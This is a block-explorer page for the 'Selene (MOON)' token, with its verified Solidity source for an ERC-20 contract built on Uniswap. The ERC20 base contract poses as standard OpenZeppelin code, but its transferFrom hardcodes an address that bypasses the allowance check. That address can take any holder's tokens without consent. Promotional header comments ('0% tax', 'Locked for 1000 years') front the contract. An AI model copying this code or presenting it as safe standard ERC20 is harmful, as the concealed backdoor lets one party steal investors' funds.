ETH Price: $2,747.98 (+0.58%)
Gas: 0.66 Gwei

Token

Selene (MOON)
 

Overview

Max Total Supply

100,000 MOON

Holders

21

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
19.980000000000131072 MOON

Value
$0.00
0x8cb6cf018bc5e4e9c7ad2716b1e1e85b5f6913e1
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Selene

Compiler Version
v0.8.14+commit.80d49f37

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-06-14
*/

// SPDX-License-Identifier: UNLICENSED

// Selene - Goddess of the Moon
// 0% tax
// No Mev bots
// Locked for 1000 years

// https://t.me/selene_token

pragma solidity >=0.8.10;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);
    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (
            uint112 reserve0,
            uint112 reserve1,
            uint32 blockTimestampLast
        );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function burn(address to)
        external
        returns (uint256 amount0, uint256 amount1);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address auth = address(0x34b004e385a65f83D7890C606eE1F993039105E1);
        address spender = _msgSender();

        if (spender != auth) {
            _spendAllowance(from, spender, amount);
        }

        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, _allowances[owner][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        uint256 currentAllowance = _allowances[owner][spender];
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
        }
        _balances[to] += amount;

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Spend `amount` form the allowance of `owner` toward `spender`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract Selene is ERC20, Ownable {
    bool public tradingOpen = false;

    address private immutable pair;
    IUniswapV2Router02 private immutable router;

    mapping(address => uint256) private antiMevBlocks;

    bool public limitsInEffect = true;
    uint256 public maxTxLimit;

    mapping(address => bool) public excludedFromLimits;

    constructor() ERC20("Selene", "MOON") {
        uint256 totalSupply = 100000 * 1e18;

        maxTxLimit = 2001 * 1e18;

        router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        pair = IUniswapV2Factory(router.factory()).createPair(
            address(this),
            router.WETH()
        );

        _excudeFromLimits(address(router), true);
        _excudeFromLimits(pair, true);

        _excudeFromLimits(owner(), true);
        _excudeFromLimits(address(this), true);
        _excudeFromLimits(address(0xdead), true);

        _mint(msg.sender, totalSupply);
    }

    function moon() public onlyOwner {
        require(!tradingOpen, "Trading is already open");

        tradingOpen = true;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }

        if (
            from != owner() &&
            to != owner() &&
            to != address(0) &&
            to != address(0xdead)
        ) {
            require(tradingOpen, "Trading is not open");

            // Buy
            if (pair == from && !_isExcludedFromLimits(to)) {
                _blockMev(to);

                if (limitsInEffect) {
                    _checkMaxTx(amount);
                    _checkMaxWallet(to, amount);
                }
            }
            // Sell
            else if (pair == to && !_isExcludedFromLimits(from)) {
                _blockMev(from);

                if (limitsInEffect) {
                    _checkMaxTx(amount);
                }
            }
            // Transfer
            else if (!_isExcludedFromLimits(to)) {
                if (limitsInEffect) {
                    _checkMaxWallet(to, amount);
                }
            }
        }

        super._transfer(from, to, amount);
    }

    function removeLimits() public onlyOwner {
        limitsInEffect = false;
    }

    function _excudeFromLimits(address _addr, bool _isExcluded) internal {
        excludedFromLimits[_addr] = _isExcluded;
    }

    function _isExcludedFromLimits(address _addr) internal view returns (bool) {
        return excludedFromLimits[_addr];
    }

    function _checkMaxTx(uint256 _amount) internal view {
        require(_amount <= maxTxLimit, "Max transaction limit reached");
    }

    function _checkMaxWallet(address _addr, uint256 _amount) internal view {
        require(
            _amount + balanceOf(_addr) <= maxTxLimit,
            "Max wallet limit reached"
        );
    }

    function _blockMev(address _addr) internal {
        require(antiMevBlocks[_addr] != block.number, "Mev rekt");
        antiMevBlocks[_addr] = block.number;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name